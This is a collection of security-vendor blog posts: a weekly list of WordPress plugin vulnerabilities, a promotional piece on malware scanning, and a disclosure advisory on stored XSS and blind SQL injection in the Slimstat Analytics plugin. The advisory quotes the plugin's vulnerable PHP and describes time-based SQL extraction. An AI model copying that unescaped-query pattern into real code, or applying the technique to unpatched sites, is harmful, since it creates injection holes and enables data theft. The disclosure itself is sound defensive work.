CVSS Score: 4.3 (Medium)
Researcher/s: Rafshanzani Suhada
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/0a58d45b-c91b-4141-992e-336650d7252b

rtMedia for WordPress, BuddyPress and bbPress <= 4.6.14 – Missing Authorization via export_settings

Affected Software: rtMedia for WordPress, BuddyPress and bbPress
CVE ID: CVE-2023-41951
CVSS Score: 4.3 (Medium)
Researcher/s: thiennv
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/0cb5df54-a6a7-4c2e-8df0-5d050218622e

Super Socializer <= 7.13.54 – Missing Authorization

Affected Software: Social Share, Social Login and Social Comments Plugin – Super Socializer
CVE ID: CVE-2023-41802
CVSS Score: 4.3 (Medium)
Researcher/s: Rafshanzani Suhada
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/101dd211-c3eb-4d27-9194-841bc2a968e6

Laposta Signup Embed <= 1.1.0 – Missing Authorization

Affected Software: Laposta Signup Embed
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/12b81441-d22c-4211-a8da-811182de622d

CP Blocks <= 1.0.20 – Cross-Site Request Forgery to Settings Update

Affected Software: CP Blocks
CVE ID: CVE-2023-41732
CVSS Score: 4.3 (Medium)
Researcher/s: Lana Codes
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/35cd1788-1756-4d03-8f6f-e5e4153e3f4f

Leadster <= 1.1.2 – Cross-Site Request Forgery

Affected Software: Leadster
CVE ID: CVE-2023-41668
CVSS Score: 4.3 (Medium)
Researcher/s: LEE SE HYOUNG
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/361216af-b939-4ac1-ae06-97552d283670

EmbedPress <= 3.8.3 – Cross-Site Request Forgery


Live News <= 1.06 – Cross-Site Request Forgery

Affected Software: Live News
CVE ID: CVE-2023-41669
CVSS Score: 4.3 (Medium)
Researcher/s: LEE SE HYOUNG
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/3ee59570-85c3-4394-bebb-c3f49c08be67

WP Gallery Metabox <= 1.0.0 – Cross-Site Request Forgery

Affected Software: WP Gallery Metabox
CVE ID: CVE-2023-41876
CVSS Score: 4.3 (Medium)
Researcher/s: Skalucy
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/46c4b7f7-e3e6-46b8-b959-07775db8bb6c

wpCentral <= 1.5.7 – Cross-Site Request Forgery

Affected Software: wpCentral
CVE ID: CVE-2023-41854
CVSS Score: 4.3 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/49d03254-7399-4a5d-9ce9-7d4736b8b2ee

Laposta Signup Embed <= 1.1.0 – Cross-Site Request Forgery

Affected Software: Laposta Signup Embed
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/4c0cbf44-f6b4-408d-9a96-98f45d890822

POEditor <= 0.9.4 – Cross-Site Request Forgery

Affected Software: POEditor
CVE ID: CVE-2023-32091
CVSS Score: 4.3 (Medium)
Researcher/s: Elliot
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/4e81e947-4892-4028-8a09-6a048bf6a572

Carousel Slider <= 2.2.2 – Missing Authorization

Affected Software: Carousel Slider
CVE ID: CVE-2023-41848
CVSS Score: 4.3 (Medium)
Researcher/s: Nguyen Anh Tien
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/5465eaab-03c0-438a-8553-c1f8b06b82bc

SIS Handball <= 1.0.45 – Cross-Site Request Forgery

Affected Software: SIS Handball
CVE ID: CVE-2023-41684
CVSS Score: 4.3 (Medium)
Researcher/s: Mika
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/5973afaa-5a64-4db1-8e32-3b39d1367eb8

Bulk NoIndex & NoFollow Toolkit <= 1.5 – Missing Authorization

Affected Software: Bulk NoIndex & NoFollow Toolkit
CVE ID: CVE-2023-41688
CVSS Score: 4.3 (Medium)
Researcher/s: Skalucy
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/5cb79fbc-705a-4fb4-b441-7fe7ab6dea10

rtMedia for WordPress, BuddyPress and bbPress <= 4.6.14 – Missing Authorization to Settings Update

Affected Software: rtMedia for WordPress, BuddyPress and bbPress
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/5dfc145e-d2d4-4137-a5c6-dec2ebb41876

WP-dTree <= 4.4.5 – Cross-Site Request Forgery

Affected Software: WP-dTree
CVE ID: CVE-2023-41667
CVSS Score: 4.3 (Medium)
Researcher/s: LEE SE HYOUNG
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/61808624-b2c7-4e86-b5a1-56f32fca9eaa

Realbig <= 1.0.2 – Cross-Site Request Forgery

Affected Software: Realbig For WordPress
CVE ID: CVE-2023-41694
CVSS Score: 4.3 (Medium)
Researcher/s: Mika
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/70ae0f3e-75a8-41c7-91c0-52d672809835

Order Delivery Date for WP e-Commerce <= 1.2 – Cross-Site Request Forgery

Affected Software: Order Delivery Date for WP e-Commerce
CVE ID: CVE-2023-41858
CVSS Score: 4.3 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/74a74817-30ff-42ec-9bd4-7d0638d6643c

Click To Tweet <= 2.0.14 – Missing Authorization

Affected Software: Click To Tweet
CVE ID: CVE-2023-41857
CVSS Score: 4.3 (Medium)
Researcher/s: thiennv
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/7f765327-3872-46cc-a4f9-40219bf0dd99

Outbound Link Manager <= 1.2 – Cross-Site Request Forgery

Affected Software: Outbound Link Manager
CVE ID: CVE-2023-41850
CVSS Score: 4.3 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/8dfc0d5e-bdc4-4f71-8aa3-0a4fbd7ef37d

Analytify Dashboard <= 5.1.0 – Missing Authorization to Opt-In

Affected Software: Analytify – Google Analytics Dashboard For WordPress (GA4 made easy)
CVE ID: CVE-2023-41695
CVSS Score: 4.3 (Medium)
Researcher/s: Abdi Pranata
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/970b3a0f-c1cc-4d85-8271-a523ccdbcc39

AWP Classifieds <= 4.3 – Cross-Site Request Forgery

Affected Software: WordPress Classifieds Plugin – Ad Directory & Listings by AWP Classifieds
CVE ID: CVE-2023-41801
CVSS Score: 4.3 (Medium)
Researcher/s: Mika
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b06a1b66-9057-4f16-878c-4fa66489f0ff

Use Memcached <= 1.0.5 – Cross-Site Request Forgery

Affected Software: Use Memcached
CVE ID: CVE-2023-41670
CVSS Score: 4.3 (Medium)
Researcher/s: Nguyen Xuan Chien
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b63f4de2-32e1-4c5e-a64d-fb66d2e2b3a8

WP Custom Post Template <= 1.0 – Cross-Site Request Forgery

Affected Software: WP Custom Post Template
CVE ID: CVE-2023-41851
CVSS Score: 4.3 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b796b514-b6ca-4a22-9340-df02fec97075

Laposta Signup Basic <= 1.4.1 – Missing Authorization

Affected Software: Laposta Signup Basic
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b7e417c2-bf9c-4c88-be2b-9c2324897b07

WP Accessibility Helper (WAH) <= 0.6.2.4 – Missing Authorization via AJAX action

Affected Software: WP Accessibility Helper (WAH)
CVE ID: CVE-2023-41869
CVSS Score: 4.3 (Medium)
Researcher/s: thiennv
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b97b84a8-cf4e-4648-8d58-b81a71b7988c

Hide admin notices – Admin Notification Center <= 2.3.2 – Cross-Site Request Forgery

Affected Software: Hide admin notices – Admin Notification Center
CVE ID: CVE-2023-41672
CVSS Score: 4.3 (Medium)
Researcher/s: Nguyen Xuan Chien
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b98c5623-15fe-4937-9a0e-770aa0ab06f3

WP iCal Availability <= 1.0.3 – Cross-Site Request Forgery

Affected Software: WP iCal Availability
CVE ID: CVE-2023-41853
CVSS Score: 4.3 (Medium)
Researcher/s: Mika
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/bc3f1d4e-84f7-4878-8b06-10444caa7dcf

Super Socializer <= 7.13.54 – Cross-Site Request Forgery

Affected Software: Social Share, Social Login and Social Comments Plugin – Super Socializer
CVE ID: CVE-2023-41802
CVSS Score: 4.3 (Medium)
Researcher/s: Rafshanzani Suhada
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/bc6cfad1-d23a-4a96-9d6c-841b6d795a01

rtMedia for WordPress, BuddyPress and bbPress <= 4.6.14 – Missing Authorization to Sensitive Information Exposure

Affected Software: rtMedia for WordPress, BuddyPress and bbPress
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/be837a77-9b25-43af-aaba-94a8aa59e7e3

SAML SP Single Sign On <= 5.0.4 – Missing Authorization to notice dismissal

Affected Software: SAML Single Sign On – SSO Login Standard
CVE ID: CVE-2023-41873
CVSS Score: 4.3 (Medium)
Researcher/s: Abdi Pranata
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/c3114906-fac1-42b9-9ba1-0a5d44c2fb3a

WP Crowdfunding <= 2.1.4 – Missing Authorization via settings_reset

Affected Software: WP Crowdfunding
CVE ID: CVE-2023-41870
CVSS Score: 4.3 (Medium)
Researcher/s: Elliot
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/cddf4aa1-5c7d-4aa1-9384-1c352f0c6da9

Laposta Signup Basic <= 1.4.1 – Cross-Site Request Forgery

Affected Software: Laposta Signup Basic
CVE ID: CVE-2023-41950
CVSS Score: 4.3 (Medium)
Researcher/s: Nguyen Xuan Chien
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d1ba4b18-ff46-45ef-b7d4-0a314cf2d74c

Duplicate Post Page Menu & Custom Post Type <= 2.3.1 – Missing Authorization to Post Duplication

Affected Software: Duplicate Post Page Menu & Custom Post Type
CVE ID: CVE-2023-4792
CVSS Score: 4.3 (Medium)
Researcher/s: Marco Wotschka
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d6bb08e8-9ef5-41db-a111-c377a5dfae77

ProfilePress <= 4.13.1 Cross-Site Request Forgery via ‘admin_notice’


WP Crowdfunding <= 2.1.5 – Cross-Site Request Forgery

Affected Software: WP Crowdfunding
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/e4dc8f18-d990-4e41-8bf8-dfa9de4c0f6e

MyCryptoCheckout <= 2.125 – Cross-Site Request Forgery

Affected Software: MyCryptoCheckout – Bitcoin, Ethereum, and 100+ altcoins for WooCommerce
CVE ID: CVE-2023-41693
CVSS Score: 4.3 (Medium)
Researcher/s: qilin_99
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/e5575725-99ba-4499-93e5-f7648c82ac52

Starter Templates <= 3.2.5 – Incorrect Authorization

Affected Software/s: Starter Templates — Elementor, WordPress & Beaver Builder Templates, Premium Starter Templates
CVE ID: CVE-2023-41805
CVSS Score: 4.3 (Medium)
Researcher/s: Rafie Muhammad
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/ebd78e52-f20d-42be-8f68-3d09d5abf837

Easy Form by AYS <= 1.3.8 – Cross-Site Request Forgery

Affected Software: Easy Form by AYS
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/ee595f48-b72f-4569-a248-7dbd0b9152ae

MailMunch – Grow your Email List <= 3.1.2 – Cross-Site Request Forgery

Affected Software: MailMunch – Grow your Email List
CVE ID: CVE-2023-41852
CVSS Score: 4.3 (Medium)
Researcher/s: Abdi Pranata
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f6409626-c8cb-412c-aff3-cbb2da212e5d

Slider Pro <= 4.8.6 – Missing Authorization via AJAX actions

Affected Software: Slider Pro
CVE ID: CVE-2023-41865
CVSS Score: 4.3 (Medium)
Researcher/s: Abdi Pranata
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f813cb1a-5922-48a5-a026-66ec9aaac294

SendPress Newsletters <= 1.22.3.31 – Cross-Site Request Forgery

Affected Software: SendPress Newsletters
CVE ID: CVE-2023-41730
CVSS Score: 4.3 (Medium)
Researcher/s: yuyudhn
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/fb70339c-0f1a-4acc-af7a-8a0320fdfe71

Directorist <= 7.7.1 – CSV Injection

Affected Software: Directorist – WordPress Business Directory Plugin with Classified Ads Listings
CVE ID: CVE-2023-41798
CVSS Score: 3.8 (Low)
Researcher/s: Rafshanzani Suhada
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/ab233ceb-270c-4694-9cf9-2de8ddfcbbfd

Modula <= 2.7.4 – Incomplete Authorization via ‘save_image’ and ‘save_images’

Affected Software: Customizable WordPress Gallery Plugin – Modula Image Gallery
CVE ID: CVE Unknown
CVSS Score: 2.2 (Low)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f029bd86-d979-45d1-97fe-75c43fb71148

As a reminder, Wordfence has curated an industry leading vulnerability database with all known WordPress core, theme, and plugin vulnerabilities known as Wordfence Intelligence.

This database is continuously updated, maintained, and populated by Wordfence’s highly credentialed and experienced vulnerability researchers through in-house vulnerability research, vulnerability researchers submitting directly to us using our CVE Request form, and by monitoring varying sources to capture all publicly available WordPress vulnerability information and adding additional context where we can.

Click here to sign-up for our mailing list to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.

The post Wordfence Intelligence Weekly WordPress Vulnerability Report (September 4, 2023 to September 10, 2023) appeared first on Wordfence.

Malware Scanning: An Essential Layer of Website Security

Wordfence recently launched Wordfence CLI, a high performance command line malware scanner, which makes use of our extensive set of malware detection signatures to rapidly scan file systems for infections.

In recent years, the WordPress community has seen a shift in emphasis towards prevention, rather than detection, of security incidents. This reflects the increased adoption of best practices such as Multi-Factor authentication, vulnerability management, and configuration hardening.

While we agree that prevention is always better than detection or remediation, one important concept in Cybersecurity is defense-in-depth, so it’s important to have a well thought-out incident response plan and adequate security monitoring in place. No security solution provides perfect protection against zero-day vulnerabilities, and even a fully locked-down site can be compromised if it shares resources with other sites that remain vulnerable. In today’s article, we’ll discuss our philosophy for securing websites, including several key cybersecurity challenges and concepts and how they relate to the case for malware scanners.


Security Should Serve Users, Not the Other Way Around

There’s an old saying that the best camera is the one you have on you, and likewise, the best security solution is the solution you’ll actually use. Users add to the complexity of securing systems, and it is easy to secure a system that nobody wants to use because it’s locked down. Security that’s easy to use and difficult to bypass is far better than security that’s difficult to use and impossible to bypass, and one guiding philosophy to cybersecurity is that nothing is truly impossible to bypass.

That’s why Wordfence prioritizes the user experience and strives to incorporate as many layers of security as possible into a package that’s easy to use for the vast majority of WordPress site owners. Traditionally this has meant plugin-based offerings. Despite the limitations of running security as a plugin, our many features, including our Web Application Firewall, Two Factor Authentication, Real-Time IP Blocklist, and Malware and Vulnerability scanner help secure over 4 million sites, detect millions of malicious files, and block billions of attacks each year.

In our 2022 Wordfence State of WordPress Security Report, we reported that our firewall blocked more than 159 Billion credential stuffing attacks, 23 Billion configuration scans, and about 12 billion attacks against vulnerabilities. You can also get a real-time view of the volume of attacks we are blocking on the Wordfence Intelligence Dashboard.


Assume Breach Mindset

While it might seem pessimistic, “assume breach” is a critical mindset in cybersecurity that involves planning mitigations in case a site is compromised. For many sites, even the most locked down ones, compromise is a matter of when, not if, and rapid detection is key to minimizing the damage. If your site has been compromised, it is important to find out as soon as possible to prevent the attacker from gaining ground and elevating privileges throughout the system. A well thought-out incident response plan is useless if you’re unaware that an incident is occurring.

The Solarwinds breach, for instance, remained undetected for more than a year, allowing threat actors to infect thousands of critical systems via a supply-chain attack. With adequate security monitoring and detection in place, this year-long infection could have been detected much sooner and impacted far fewer systems if detected earlier. This also highlights how even those striving to put forth the best security may still have gaps in coverage where an attacker can breach defenses.


Layered Security

No single solution will ever be perfect, and it is not possible to completely eliminate risk, only manage it. One of the most effective ways to manage risk is to layer defenses so that bypassing any one layer does not allow an attacker to take complete control. This is why, for instance, it is important to use both strong passwords and multifactor authentication, and why backups are important but not a replacement for intrusion detection.

Another example of this is the contrast between Cloud-based solutions versus our Web Application Firewall – a Cloud solution would be well-suited to providing DDOS protection and blocking some generic attacks, while our WAF benefits from running with the plugin because it can block attacks specifically targeted against WordPress vulnerabilities without unnecessarily blocking legitimate administrative traffic.

Our team has deployed hundreds of firewall rules that take advantage of our Web Application Firewall’s unique capabilities. Many of the privilege escalation and authentication bypass vulnerabilities we see have parameters and values that require specialized experience and techniques to adequately block. For instance, many privilege escalation vulnerabilities, such as the one we found in the JupiterX Theme, make use of administrative functionality that has been accidentally exposed to low-level users, often via an AJAX action.

With a generic ruleset from ModSecurity, attacks of this type couldn’t be blocked without entirely breaking most site functionality. Even the most advanced cloud firewalls able to scan POST parameters by terminating TLS at the edge would still prevent administrative users from performing necessary tasks. Thanks to our custom firewall rules, the Wordfence firewall is able to easily block malicious traffic without impacting site functionality, and thanks to our in-house vulnerability research we’re often the first to release firewall rules for new critical vulnerabilities.


Trusting Trust

An often overlooked concept in cybersecurity is the problem of “trusting trust.” On any given system, an attacker that can run code can tamper with any other code running at the same privilege level. This is often used as an argument against plugin-based malware scanners and admittedly does present a challenge since any attacker able to compromise a site to the point where they can execute code can run that code at the same level as a plugin.

Many of our users install Wordfence after they have become aware of a breach and successfully use our scanner for remediation. Most malware is still not sophisticated enough to evade detection in this way, and even malware that is designed to do so often fails to fully hide its tracks from detection. Additionally, based on research our team has done on WordPress threat actors, many are unwilling or unable to develop their own evasion payloads or pay the premium for off-the-shelf solutions.

Nonetheless, such tampering is becoming more common, and no plugin-based scanner is immune to it, but our plugin-based scanner still reliably detects an enormous amount of malware and we have the telemetry to prove it – roughly 1 million sites successfully used Wordfence to clean malware in 2022, based on the total number of sites we saw infections on compared the number of sites that remained infected at the end of the year.

Fortunately, even the most cleverly designed file-based malware can’t successfully hide from a scanner it can’t tamper with, and Wordfence CLI is an effective solution for sites that need this extra layer of detection.


Responsible Remediation

When it comes to remediation, a one-size-fits-all approach simply doesn’t work. Many sites have unique needs, custom code, or technical debt. Replacing core WordPress files and plugins with known clean versions can fix many issues, and our scanner offers the option to do this, but many infections will simply reoccur if the root cause is not addressed. Tools to automate remediation can be incredibly useful, but fully automated remediation can cause more problems than it solves while providing a false sense of security – there should always be a human making final remediation decisions. This is why our Wordfence Care and Wordfence Response offerings use skilled analysts to clean your website and get it back into working order, and we highly recommend these services to less experienced site owners, or site owners who simply want to trust the experts to handle remediation.


Continuous Improvement

Our malware signatures are designed to detect not only active infections but also artifacts generated by malware and other indicators of compromise. Our team of specialists constantly monitors new malware variants and we release dozens of new signatures every month to keep up with attackers. Since our signatures use carefully crafted regular expressions, each signature can detect thousands and oftentimes even millions of unique malicious files.

In the spirit of continuous improvement, we’ve launched an additional, user-friendly layer of security with our Wordfence CLI scanner. While it is designed for power users and administrators, it unlocks new possibilities for detection that were not available with our plugin scanner.


More Flexibility with Wordfence CLI

One of the most frequent requests we’ve received over the years was the ability to run scans programmatically via the command line rather than via the plugin. Not only does this mitigate tampering concerns and result in a massive performance boost, but it also allows for extended use cases – you can use it to scan backups outside of the webroot to ensure their integrity before restoring them, or to more thoroughly scan for database infections by running it against database exports, since scanning live databases tends to be extremely resource-intensive. You can use it to quickly scan just files that were recently modified by piping the results from the Linux find command to the Wordfence cli scanner, or exclude signatures from the scan in the rare cases where your custom code is detected by one of our signatures.

Wordfence CLI is open-source and can be fully customized or forked, and while our basic Free signature set may not be used for commercial purposes, it is designed to detect the most widespread indicators of compromise found on more than 90% of all infected sites. Bear in mind that most infections involve multiple malicious components, so for more comprehensive scanning and remediation, we recommend our Commercial signature set which detects more than 18 million unique malware variants in the wild.

Conclusion

In today’s article, we discussed some key components of our strategy for securing websites, including user experience, layered security, the assumption of breach, the problem of trusting trust, responsible remediation, and our drive for continuous improvement. Our goal is to provide the best security possible for your website, and that means providing security you’ll actually use.

While no single solution offers perfect protection, Wordfence offers prevention, detection, and remediation packages that will significantly improve your security posture while remaining compatible with other solutions. With the launch of Wordfence CLI, it is now possible to scan hundreds or even thousands of sites with a single, competitively priced license, all while conserving server resources.

The post Malware Scanning: An Essential Layer of Website Security appeared first on Wordfence.

Over 100,000 WordPress Websites Affected by XSS and SQLi Vulnerabilities in Slimstat Analytics Plugin

On August 24, 2023, our Wordfence Threat Intelligence team identified and began the responsible disclosure process for a stored Cross-Site Scripting (XSS) and a Blind SQL Injection vulnerability in the Slimstat Analytics plugin, which is actively installed on more than 100,000 WordPress websites. The vulnerability enables threat actors with contributor-level permissions or higher to inject malicious web scripts into pages or execute SQL queries by appending them to an existing SQL query using the plugin’s shortcode.

All Wordfence PremiumWordfence Care, and Wordfence Response customers, as well as those still using the free version of our plugin, are protected against any exploits targeting this vulnerability by the Wordfence firewall’s built-in Cross-Site Scripting and SQL Injection protection.

We contacted VeronaLabs on August 24, 2023, and we received a response on the same day. After providing full disclosure details, the developer released a patch on August 28, 2023. We would like to commend VeronaLabs for their prompt response and timely patch.

We urge users to update their sites with the latest patched version of Slimstat Analytics, version 5.0.10 at the time of this writing, as soon as possible.

Vulnerability Summary from Wordfence Intelligence

Description: Slimstat Analytics <= 5.0.9 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Affected Plugin: Slimstat Analytics
Plugin Slug: wp-slimstat
Affected Versions: <= 5.0.9
CVE ID: CVE-2023-4597
CVSS Score: 6.4 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Researcher/s: Lana Codes
Fully Patched Version: 5.0.10

The Slimstat Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘slimstat’ shortcode in versions up to, and including, 5.0.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

Description: Slimstat Analytics <= 5.0.9 – Authenticated (Contributor+) Blind SQL Injection via Shortcode
Affected Plugin: Slimstat Analytics
Plugin Slug: wp-slimstat
Affected Versions: <= 5.0.9
CVE ID: CVE-2023-4598
CVSS Score: 8.8 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Researcher/s: Lana Codes, Chloe Chamberland
Fully Patched Version: 5.0.10

The Slimstat Analytics plugin for WordPress is vulnerable to SQL Injection via the plugin’s shortcode in versions up to, and including, 5.0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with contributor-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

Technical Analysis

Slimstat Analytics is a WordPress website traffic analytics plugin that offers several features for analyzing and monitoring traffic. It provides a shortcode ([slimstat]) that displays various types of statistics when added to a WordPress page or post.

Unfortunately, insecure implementation of the plugin’s shortcode functionality allows for the injection of arbitrary web scripts into these pages. Examining the code reveals that the shortcode has several types based on the ‘f’ parameter. In vulnerable versions, the ‘top-all’ type does not adequately sanitize the user-supplied ‘w’ attribute, and then fails to escape the ‘class’ output derived from the ‘w’ parameter when it displays the statistics. This makes it possible to inject attribute-based Cross-Site Scripting payloads via the ‘w’ attribute.

public static function slimstat_shortcode($_attributes = '', $_content = '')
{
	shortcode_atts(array(
		'f' => '',    // recent, popular, count, widget
		'w' => '',    // column to use (for recent, popular and count) or widget to use
		's' => ' ',    // separator
		'o' => 0    // offset for counters
	), $_attributes);
line 724

$output = '<ul class="slimstat-shortcode ' . $f . implode('-', $w) . '">' . implode('', $output) . '</ul>';

The slimstat_shortcode method snippet in the wp_slimstat class

This makes it possible for threat actors with contributor-level access to a site to carry out stored XSS attacks. Once a script is injected into a page or post, it will execute each time a user accesses the affected page. While this vulnerability does require that a trusted contributor account is compromised, or that a user be able to register as a contributor, successful threat actors could steal sensitive information, manipulate site content, inject administrative users, edit files, or redirect users to malicious websites which are all severe consequences.

Further examining the code, we also found a SQL Injection vulnerability within the same shortcode. Although the ‘w’ parameter will be converted into an array, it is not properly sanitized. This parameter is used for the column in the database query, and although the prepare function is used, the column is not specified as a placeholder, which makes it possible for an attacker to perform SQL injection attacks.

$w = self::string_to_array($w);

The slimstat_shortcode method snippet in the wp_slimstat class

public static function get_top($_column = 'id', $_where = '', $_having = '', $_use_date_filters = true, $_as_column = '')
{
	// This function can be passed individual arguments, or an array of arguments
	if (is_array($_column)) {
		$_where            = !empty($_column['where']) ? $_column['where'] : '';
		$_having           = !empty($_column['having']) ? $_column['having'] : '';
		$_use_date_filters = !empty($_column['use_date_filters']) ? $_column['use_date_filters'] : true;
		$_as_column        = !empty($_column['as_column']) ? $_column['as_column'] : '';
		$_column           = $_column['columns'];
	}

	$group_by_column = $_column;

	if (!empty($_as_column)) {
		$_column = "$_column AS $_as_column";
	} else {
		$_as_column = $_column;
	}

	$_where = self::get_combined_where($_where, $_as_column, $_use_date_filters);

	// prepare the query
	$sql = $GLOBALS['wpdb']->prepare("
		SELECT $_column, COUNT(*) counthits
		FROM {$GLOBALS['wpdb']->prefix}slim_stats
		WHERE $_where
		GROUP BY $group_by_column $_having
		ORDER BY counthits DESC
		LIMIT 0, %d", self::$filters_normalized['misc']['limit_results']);
	return self::get_results($sql, ((!empty($_as_column) && $_as_column != $_column) ? $_as_column : $_column),
		'counthits DESC', ((!empty($_as_column) && $_as_column != $_column) ? $_as_column : $_column),
		'SUM(counthits) AS counthits');
}

The get_top method in the wp_slimstat_db class

Since no data from the SQL query was returned in the response, an attacker would need to use a Time-Based blind approach to extract information from the database. This means that they would need to use SQL CASE statements along with the SLEEP() command while observing the response time of each request to steal information from the database. This is an intricate, yet frequently successful method to obtain information from a database when exploiting SQL Injection vulnerabilities.

Disclosure Timeline

August 24, 2023 – Wordfence Threat Intelligence team discovers the stored XSS and SQL Injection vulnerabilities in Slimstat Analytics.
August 24, 2023 – We initiate contact with the plugin vendor asking that they confirm the inbox for handling the discussion.
August 26, 2023 – The vendor confirms the inbox for handling the discussion.
August 26, 2023 – We send over the full disclosure details for the XSS vulnerability.
August 27, 2023 – We send over the full disclosure details for the SQL injection vulnerability.
August 27, 2023 – The vendor acknowledges the report and begins working on a fix.
August 28, 2023 – The fully patched version, 5.0.10, is released.

Conclusion

In this blog post, we have detailed stored XSS and SQL Injection vulnerabilities within the Slimstat Analytics plugin affecting versions 5.0.9 and earlier. This vulnerability allows authenticated threat actors with contributor-level permissions or higher to inject malicious web scripts into pages that execute when a user accesses an affected page, and extract sensitive information from a database. These vulnerabilities have been fully addressed in version 5.0.10 of the plugin.

We encourage WordPress users to verify that their sites are updated to the latest patched version of Slimstat Analytics.

All Wordfence users, including those running Wordfence PremiumWordfence Care, and Wordfence Response, as well as sites still running the free version of Wordfence, are fully protected against this vulnerability.

If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.

For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.

The post Over 100,000 WordPress Websites Affected by XSS and SQLi Vulnerabilities in Slimstat Analytics Plugin appeared first on Wordfence.

Wordfence Intelligence Weekly WordPress Vulnerability Report (August 28, 2023 to September 3, 2023)

Last week, there were 64 vulnerabilities disclosed in 61 WordPress Plugins and 2 WordPress themes that have been added to the Wordfence Intelligence Vulnerability Database, and there were 32 Vulnerability Researchers that contributed to WordPress Security last week. Review those vulnerabilities in this report now to ensure your site is not affected.

Our mission with Wordfence Intelligence is to make valuable vulnerability information easily accessible to everyone, like the WordPress community, so individuals and organizations alike can utilize that data to make the internet more secure. That is why the Wordfence Intelligence user interface, vulnerability API and webhook notifications are completely free to access and utilize both personally and commercially, and why we are running this weekly vulnerability report.

